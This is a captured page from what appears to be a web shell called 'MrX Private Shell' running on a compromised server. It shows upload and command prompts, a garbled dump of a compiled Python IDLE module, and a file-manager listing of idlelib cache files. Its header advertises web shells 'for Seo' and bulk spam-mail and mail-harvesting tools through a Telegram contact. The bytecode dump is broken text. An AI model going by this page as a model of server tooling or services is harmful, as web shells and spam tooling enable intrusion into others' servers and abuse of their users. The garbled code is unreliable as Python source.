__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

aptanhua@216.73.216.7: ~ $
�
��f�c@s�dZddlZddlmZGdd�d�Zdd�Zdd	�Zd
d�Zdd
�Zdd�Z	dd�Z
edkr�ddlm
Z
dge
_ddlZejddddd�ndS(u�Extension to format a paragraph or selection to a max width.

Does basic, standard text formatting, and also understands Python
comment blocks. Thus, for editing Python source code, this
extension is really only suitable for reformatting these comment
blocks or triple-quoted strings.

Known problems with comment reformatting:
* If there is a selection marked, and the first line of the
  selection is not complete, the block will probably not be detected
  as comments, and will have the normal "text formatting" rules
  applied.
* If a comment block has leading whitespace that mixes tabs and
  spaces, they will not be considered part of the same block.
* Fancy comments, like this bulleted list, aren't handled :-)
iN(uidleConfcBsJ|EeZdZddgfgZdd�Zdd�Zdd	�Zd
S(uFormatParagraphuformatuFormat Paragraphu<<format-paragraph>>cCs
||_dS(N(ueditwin(uselfueditwin((u</opt/alt/python33/lib64/python3.3/idlelib/FormatParagraph.pyu__init__suFormatParagraph.__init__cCs
d|_dS(N(uNoneueditwin(uself((u</opt/alt/python33/lib64/python3.3/idlelib/FormatParagraph.pyuclose suFormatParagraph.closec	Cs>tjddddd�}|jj}|jj�\}}|ri|ri|j||�}t|�}n$t||jd��\}}}}|r�t	|||�}nt
||�}|jddd	�||kr|jd|�|j
�|j||�|j||�|j�n|jd|�|jd�d
S(u�Formats paragraph to a max width specified in idleConf.

        If text is selected, format_paragraph_event will start breaking lines
        at the max width, starting from the beginning selection.

        If no text is selected, format_paragraph_event uses the current
        cursor location to determine the paragraph (lines of text surrounded
        by blank lines) and formats it.
        umainuFormatParagraphu	paragraphutypeuintuinsertuselu1.0uendubreak(uidleConfu	GetOptionueditwinutextuget_selection_indicesugetuget_comment_headerufind_paragraphuindexureformat_commentureformat_paragraphu
tag_removeumark_setuundo_block_startudeleteuinsertuundo_block_stopusee(	uselfueventumaxformatwidthutextufirstulastudataucomment_headerunewdata((u</opt/alt/python33/lib64/python3.3/idlelib/FormatParagraph.pyuformat_paragraph_event#s*
$


u&FormatParagraph.format_paragraph_eventN(uFormat Paragraphu<<format-paragraph>>(u__name__u
__module__u__qualname__umenudefsu__init__ucloseuformat_paragraph_event(u
__locals__((u</opt/alt/python33/lib64/python3.3/idlelib/FormatParagraph.pyuFormatParagraphs
uFormatParagraphc

Cs�tt|jd��\}}|jd|d|�}xM|jd|dd�r�t|�r�|d}|jd|d|�}q;W|}t|�}t|�}xQt|�|kr�t||d��r�|d}|jd|d|�}q�Wd|}|d}|jd|d|�}x]|dkr�t|�|kr�t||d��r�|d}|jd|d|�}q+Wd|d}	|	|||j|	|�fS(	u�Returns the start/stop indices enclosing the paragraph that mark is in.

    Also returns the comment format string, if any, and paragraph of text
    between the start/stop indices.
    u.u%d.0u%d.endu<uendiNi(umapuintusplitugetucompareuis_all_whiteuget_comment_headerulen(
utextumarkulinenoucolulineufirst_linenoucomment_headerucomment_header_lenulastufirst((u</opt/alt/python33/lib64/python3.3/idlelib/FormatParagraph.pyufind_paragraphHs,(




ufind_paragraphc	Cs|jd�}d}t|�}x*||krMt||�rM|d}q$W||kr^|St||�}|d|kr�t||d�r�t||d�}n|}|d|�}|}x||kr�t||�r�tjd||�}	x�tdt|	�d�D]�}
|	|
}|s1qnt||j��|kru||kru|j|j��|}n||d}|
dt|	�kr|	|
ddkr|d}qqW|d}q�W|j|j��|j	||d��dj
|�S(u3Return data reformatted to specified width (limit).u
iiNu(\s+)iu (usplitulenuis_all_whiteu
get_indentureurangeu
expandtabsuappendurstripuextendujoin(udataulimitulinesuiunuindent1uindent2unewupartialuwordsujuword((u</opt/alt/python33/lib64/python3.3/idlelib/FormatParagraph.pyureformat_paragraphms<% 
	*ureformat_paragraphcs�t���dj�fdd�|jd�D��}t|t��d�}t||�}|jd�}d}|d	s�d}|dd
�}ndj�fdd�|D��|S(u?Return data reformatted to specified width with comment header.u
c3s|]}|�d�VqdS(N((u.0uline(ulc(u</opt/alt/python33/lib64/python3.3/idlelib/FormatParagraph.pyu	<genexpr>�su#reformat_comment.<locals>.<genexpr>iuiNc3s|]}�|VqdS(N((u.0uline(ucomment_header(u</opt/alt/python33/lib64/python3.3/idlelib/FormatParagraph.pyu	<genexpr>�si����i����(ulenujoinusplitumaxureformat_paragraph(udataulimitucomment_headeruformat_widthunewdataublock_suffix((ucomment_headerulcu</opt/alt/python33/lib64/python3.3/idlelib/FormatParagraph.pyureformat_comment�s+
ureformat_commentcCstjd|�dk	S(u/Return True if line is empty or all whitespace.u^\s*$N(ureumatchuNone(uline((u</opt/alt/python33/lib64/python3.3/idlelib/FormatParagraph.pyuis_all_white�suis_all_whitecCstjd|�j�S(u/Return the initial space or tab indent of line.u	^([ \t]*)(ureumatchugroup(uline((u</opt/alt/python33/lib64/python3.3/idlelib/FormatParagraph.pyu
get_indent�su
get_indentcCs/tjd|�}|dkr"dS|jd�S(uReturn string with leading whitespace and '#' from line or ''.

    A null return indicates that the line is not a comment line. A non-
    null return, such as '    #', will be used to find the other lines of
    a comment block with the same  indent.
    u^([ \t]*#*)uiN(ureumatchuNoneugroup(ulineum((u</opt/alt/python33/lib64/python3.3/idlelib/FormatParagraph.pyuget_comment_header�suget_comment_headeru__main__(usupportuguiu&idlelib.idle_test.test_formatparagraphu	verbosityiuexitF(u__doc__ureuidlelib.configHandleruidleConfuFormatParagraphufind_paragraphureformat_paragraphureformat_commentuis_all_whiteu
get_indentuget_comment_headeru__name__utestusupportu
use_resourcesuunittestumainuFalse(((u</opt/alt/python33/lib64/python3.3/idlelib/FormatParagraph.pyu<module>s3%$

Filemanager

Name Type Size Permission Actions
AutoComplete.cpython-33.pyc File 10 KB 0644
AutoComplete.cpython-33.pyo File 10 KB 0644
AutoCompleteWindow.cpython-33.pyc File 15.67 KB 0644
AutoCompleteWindow.cpython-33.pyo File 15.61 KB 0644
AutoExpand.cpython-33.pyc File 2.96 KB 0644
AutoExpand.cpython-33.pyo File 2.96 KB 0644
Bindings.cpython-33.pyc File 4.89 KB 0644
Bindings.cpython-33.pyo File 4.89 KB 0644
CallTipWindow.cpython-33.pyc File 7.45 KB 0644
CallTipWindow.cpython-33.pyo File 7.45 KB 0644
CallTips.cpython-33.pyc File 7.72 KB 0644
CallTips.cpython-33.pyo File 7.72 KB 0644
ClassBrowser.cpython-33.pyc File 12.05 KB 0644
ClassBrowser.cpython-33.pyo File 12.05 KB 0644
CodeContext.cpython-33.pyc File 8.05 KB 0644
CodeContext.cpython-33.pyo File 8 KB 0644
ColorDelegator.cpython-33.pyc File 11 KB 0644
ColorDelegator.cpython-33.pyo File 11 KB 0644
Debugger.cpython-33.pyc File 21.18 KB 0644
Debugger.cpython-33.pyo File 21.18 KB 0644
Delegator.cpython-33.pyc File 1.65 KB 0644
Delegator.cpython-33.pyo File 1.65 KB 0644
EditorWindow.cpython-33.pyc File 74.34 KB 0644
EditorWindow.cpython-33.pyo File 74.23 KB 0644
FileList.cpython-33.pyc File 4.98 KB 0644
FileList.cpython-33.pyo File 4.95 KB 0644
FormatParagraph.cpython-33.pyc File 8.09 KB 0644
FormatParagraph.cpython-33.pyo File 8.09 KB 0644
GrepDialog.cpython-33.pyc File 6.2 KB 0644
GrepDialog.cpython-33.pyo File 6.2 KB 0644
HyperParser.cpython-33.pyc File 7.82 KB 0644
HyperParser.cpython-33.pyo File 7.82 KB 0644
IOBinding.cpython-33.pyc File 19.99 KB 0644
IOBinding.cpython-33.pyo File 19.99 KB 0644
IdleHistory.cpython-33.pyc File 4.63 KB 0644
IdleHistory.cpython-33.pyo File 4.63 KB 0644
MultiCall.cpython-33.pyc File 22.06 KB 0644
MultiCall.cpython-33.pyo File 21.98 KB 0644
MultiStatusBar.cpython-33.pyc File 1.84 KB 0644
MultiStatusBar.cpython-33.pyo File 1.84 KB 0644
ObjectBrowser.cpython-33.pyc File 8.23 KB 0644
ObjectBrowser.cpython-33.pyo File 8.23 KB 0644
OutputWindow.cpython-33.pyc File 6.47 KB 0644
OutputWindow.cpython-33.pyo File 6.47 KB 0644
ParenMatch.cpython-33.pyc File 8.81 KB 0644
ParenMatch.cpython-33.pyo File 8.81 KB 0644
PathBrowser.cpython-33.pyc File 5.68 KB 0644
PathBrowser.cpython-33.pyo File 5.68 KB 0644
Percolator.cpython-33.pyc File 4.72 KB 0644
Percolator.cpython-33.pyo File 4.48 KB 0644
PyParse.cpython-33.pyc File 11.58 KB 0644
PyParse.cpython-33.pyo File 11.03 KB 0644
PyShell.cpython-33.pyc File 65.98 KB 0644
PyShell.cpython-33.pyo File 65.82 KB 0644
RemoteDebugger.cpython-33.pyc File 22.39 KB 0644
RemoteDebugger.cpython-33.pyo File 22.21 KB 0644
RemoteObjectBrowser.cpython-33.pyc File 3.34 KB 0644
RemoteObjectBrowser.cpython-33.pyo File 3.34 KB 0644
ReplaceDialog.cpython-33.pyc File 8.06 KB 0644
ReplaceDialog.cpython-33.pyo File 8.06 KB 0644
RstripExtension.cpython-33.pyc File 1.86 KB 0644
RstripExtension.cpython-33.pyo File 1.86 KB 0644
ScriptBinding.cpython-33.pyc File 9.03 KB 0644
ScriptBinding.cpython-33.pyo File 9.03 KB 0644
ScrolledList.cpython-33.pyc File 8 KB 0644
ScrolledList.cpython-33.pyo File 8 KB 0644
SearchDialog.cpython-33.pyc File 3.72 KB 0644
SearchDialog.cpython-33.pyo File 3.72 KB 0644
SearchDialogBase.cpython-33.pyc File 7.46 KB 0644
SearchDialogBase.cpython-33.pyo File 7.46 KB 0644
SearchEngine.cpython-33.pyc File 9.98 KB 0644
SearchEngine.cpython-33.pyo File 9.98 KB 0644
StackViewer.cpython-33.pyc File 7.24 KB 0644
StackViewer.cpython-33.pyo File 7.24 KB 0644
ToolTip.cpython-33.pyc File 5.43 KB 0644
ToolTip.cpython-33.pyo File 5.43 KB 0644
TreeWidget.cpython-33.pyc File 22.58 KB 0644
TreeWidget.cpython-33.pyo File 22.58 KB 0644
UndoDelegator.cpython-33.pyc File 16.72 KB 0644
UndoDelegator.cpython-33.pyo File 16.72 KB 0644
WidgetRedirector.cpython-33.pyc File 6.48 KB 0644
WidgetRedirector.cpython-33.pyo File 6.48 KB 0644
WindowList.cpython-33.pyc File 4.86 KB 0644
WindowList.cpython-33.pyo File 4.86 KB 0644
ZoomHeight.cpython-33.pyc File 1.95 KB 0644
ZoomHeight.cpython-33.pyo File 1.95 KB 0644
__init__.cpython-33.pyc File 148 B 0644
__init__.cpython-33.pyo File 148 B 0644
__main__.cpython-33.pyc File 312 B 0644
__main__.cpython-33.pyo File 312 B 0644
aboutDialog.cpython-33.pyc File 7.9 KB 0644
aboutDialog.cpython-33.pyo File 7.9 KB 0644
configDialog.cpython-33.pyc File 57.86 KB 0644
configDialog.cpython-33.pyo File 57.86 KB 0644
configHandler.cpython-33.pyc File 32.27 KB 0644
configHandler.cpython-33.pyo File 32.27 KB 0644
configHelpSourceEdit.cpython-33.pyc File 7.72 KB 0644
configHelpSourceEdit.cpython-33.pyo File 7.72 KB 0644
configSectionNameDialog.cpython-33.pyc File 5.47 KB 0644
configSectionNameDialog.cpython-33.pyo File 5.47 KB 0644
dynOptionMenuWidget.cpython-33.pyc File 2 KB 0644
dynOptionMenuWidget.cpython-33.pyo File 2 KB 0644
idle.cpython-33.pyc File 422 B 0644
idle.cpython-33.pyo File 422 B 0644
idlever.cpython-33.pyc File 180 B 0644
idlever.cpython-33.pyo File 180 B 0644
keybindingDialog.cpython-33.pyc File 14.48 KB 0644
keybindingDialog.cpython-33.pyo File 14.48 KB 0644
macosxSupport.cpython-33.pyc File 8.19 KB 0644
macosxSupport.cpython-33.pyo File 8.19 KB 0644
rpc.cpython-33.pyc File 28.19 KB 0644
rpc.cpython-33.pyo File 28.03 KB 0644
run.cpython-33.pyc File 16.84 KB 0644
run.cpython-33.pyo File 16.79 KB 0644
tabbedpages.cpython-33.pyc File 22.38 KB 0644
tabbedpages.cpython-33.pyo File 22.38 KB 0644
testcode.cpython-33.pyc File 1.65 KB 0644
testcode.cpython-33.pyo File 1.65 KB 0644
textView.cpython-33.pyc File 5.03 KB 0644
textView.cpython-33.pyo File 5.03 KB 0644